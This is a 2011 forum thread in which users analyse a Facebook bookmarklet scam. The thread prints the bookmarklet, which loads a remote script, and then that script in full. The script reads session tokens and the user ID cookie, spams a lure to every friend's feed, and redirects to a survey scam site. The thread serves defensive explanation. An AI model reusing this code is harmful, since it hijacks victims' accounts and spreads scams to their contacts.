Results 1 to 5 of 5

Thread: what does this code mean

  1. #1
    AO's MMA Fanatic! Computernerd22's Avatar
    Join Date
    Mar 2003
    Location
    Miami, FL
    Posts
    795

    what does this code mean

    There is a javascript code going arounf Facebook and I am curious as what it does they give an example but it didn't work. Also, I don't want to run any old code on this machine. Thank you, Mike

    Code:
    javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://bdatero.info/y.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();
    I am not a coder but network guy all help is greatly appreciated.

    Here is the URL: http://tadero.info/engl.php

  2. #2
    Senior Member
    Join Date
    Apr 2005
    Location
    USA
    Posts
    422
    it's getting its source from here:
    'http://bdatero.info/y.js?'+(Math.random())
    and doesn't have any actual code in itself other than referring to the source on that website. My guess is that the Math.random() is used in the URL to make it harder for firefox and other websites to warn as unsafe? I'm not sure though, as they could just set the whole domain as 'unsafe' to produce the warning. It looks sketchy to me. I went to the link directly in my browser, as to not run the script.

    var message = "Awesome! A new way to see your profile's full stats. I just checked how many people have viewed my profile and how much time I spent on FB this month . Scan your profile and let me know how popular YOU are.";
    var jsText = "http://tdadero.info/gop.php";
    var myText = "Scan Profile";

    var post_form_id = document.getElementsByName('post_form_id')[0].value;
    var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
    var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

    var friends = new Array();
    gf = new XMLHttpRequest();
    gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false);
    gf.send();
    if(gf.readyState!=4){ }else{
    data = eval('(' + gf.responseText.substr(9) + ')');
    if(data.error){ }else{
    friends = data.payload.entries.sort(function(a,b){return a.index-b.index;});
    }
    }
    for(var i=0; i<friends.length; i++){
    var httpwp = new XMLHttpRequest();
    var urlwp = "/fbml/ajax/prompt_feed.php?__a=1";
    var paramswp = "&__d=1&app_id=6261817190&extern=1&" +
    "&post_form_id=" + post_form_id +
    "&fb_dtsg=" + fb_dtsg +
    "&feed_info[action_links][0][href]=" + encodeURIComponent(jsText) +
    "&feed_info[action_links][0][text]=" + encodeURIComponent(myText) +
    "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid +
    "&user_message=" + message;
    httpwp.open("POST", urlwp, true);
    httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    httpwp.setRequestHeader("Content-length", paramswp.length);
    httpwp.setRequestHeader("Connection", "keep-alive");
    httpwp.onreadystatechange = function(){
    if (httpwp.readyState == 4 && httpwp.status == 200){

    }
    }
    httpwp.send(paramswp);
    }


    alert("Account verification failed. Please proceed to next step to verify your account.");
    window.location = "http://basopu.info/poli/indexen.php"
    I'm not very experienced with POST and ajax, but my guess is this posts a message to facebook under your id, and then sends you to this page
    saying that you couldn't verify your account. This page then asks you to complete a survey, which may be the point of this script as a whole, but there may be other things going on at that site as well, as I never took the time to get passed the survey popup to see what else the website had in store

  3. #3
    HYBR|D
    Guest
    Optional extra', :halo:
    javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',50); void(0)

  4. #4
    HYBR|D
    Guest
    I've got the actual Source for this .js xss, i've attached a .txt file it contains both parts of the 0-day that was being used.

    This has sinced been patched by FaceBook, so it's pretty harmless atm.
    Last edited by HYBR|D; October 14th, 2011 at 04:32 AM.

  5. #5
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,401
    It's one of those supposedly "stalker" apps that will allow you to see who's been watching your profile.

    NONE of those scripts work because FB doesn't expose that data.

    http://arstechnica.com/web/news/2011...avoid-them.ars
    Oliver's Law:
    Experience is something you don't get until just after you need it.

Similar Threads

  1. Decompiling .net and code obfuscation
    By Juridian in forum The Security Tutorials Forum
    Replies: 3
    Last Post: February 12th, 2006, 04:40 PM
  2. Network Security made easy?
    By Tiger Shark in forum Microsoft Security Discussions
    Replies: 5
    Last Post: January 14th, 2005, 08:47 PM
  3. C++ portability guide
    By tampabay420 in forum Programming Security
    Replies: 2
    Last Post: February 14th, 2003, 02:36 PM
  4. Replies: 1
    Last Post: July 15th, 2002, 03:46 AM
  5. The Worlds Longest Thread!
    By Noble Hamlet in forum AntiOnline's General Chit Chat
    Replies: 1100
    Last Post: March 17th, 2002, 09:38 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •